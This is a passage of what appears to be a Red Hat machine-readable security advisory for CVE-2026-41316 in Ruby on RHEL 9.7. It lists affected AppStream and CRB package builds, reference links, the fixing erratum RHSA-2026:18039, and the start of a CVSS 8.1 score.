"AppStream-9.7.0.Z.MAIN:rubygem-bundler-0:2.2.33-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-irb-0:1.3.5-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-minitest-0:5.14.2-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-power_assert-0:1.2.1-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-rake-0:13.0.3-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:1.4.0-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-rdoc-0:6.3.4.1-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-rexml-0:3.2.5-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-rss-0:0.2.9-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-test-unit-0:3.3.7-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-typeprof-0:0.15.2-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygems-0:3.2.33-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygems-devel-0:3.2.33-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.src",
"CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:ruby-default-gems-0:3.0.7-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:ruby-doc-0:3.0.7-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-bundler-0:2.2.33-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-irb-0:1.3.5-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-minitest-0:5.14.2-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-power_assert-0:1.2.1-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-rake-0:13.0.3-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-rbs-0:1.4.0-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-rdoc-0:6.3.4.1-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-rexml-0:3.2.5-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-rss-0:0.2.9-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-test-unit-0:3.3.7-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-typeprof-0:0.15.2-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygems-0:3.2.33-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygems-devel-0:3.2.33-166.el9_7.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-41316"
},
{
"category": "external",
"summary": "RHBZ#2461369",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461369"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-41316",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41316"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-41316",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41316"
},
{
"category": "external",
"summary": "https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv",
"url": "https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv"
}
],
"release_date": "2026-04-24T02:35:41.160000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-18T12:25:23+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.src",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:ruby-default-gems-0:3.0.7-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:ruby-doc-0:3.0.7-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-bundler-0:2.2.33-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-irb-0:1.3.5-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-minitest-0:5.14.2-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-power_assert-0:1.2.1-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-rake-0:13.0.3-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:1.4.0-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-rdoc-0:6.3.4.1-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-rexml-0:3.2.5-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-rss-0:0.2.9-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-test-unit-0:3.3.7-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygem-typeprof-0:0.15.2-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygems-0:3.2.33-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:rubygems-devel-0:3.2.33-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.src",
"CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:ruby-default-gems-0:3.0.7-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:ruby-doc-0:3.0.7-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-bundler-0:2.2.33-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-irb-0:1.3.5-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-minitest-0:5.14.2-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-power_assert-0:1.2.1-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.i686",
"CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rubygem-rake-0:13.0.3-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-rbs-0:1.4.0-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-rdoc-0:6.3.4.1-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-rexml-0:3.2.5-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-rss-0:0.2.9-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-test-unit-0:3.3.7-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygem-typeprof-0:0.15.2-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygems-0:3.2.33-166.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:rubygems-devel-0:3.2.33-166.el9_7.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:18039"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
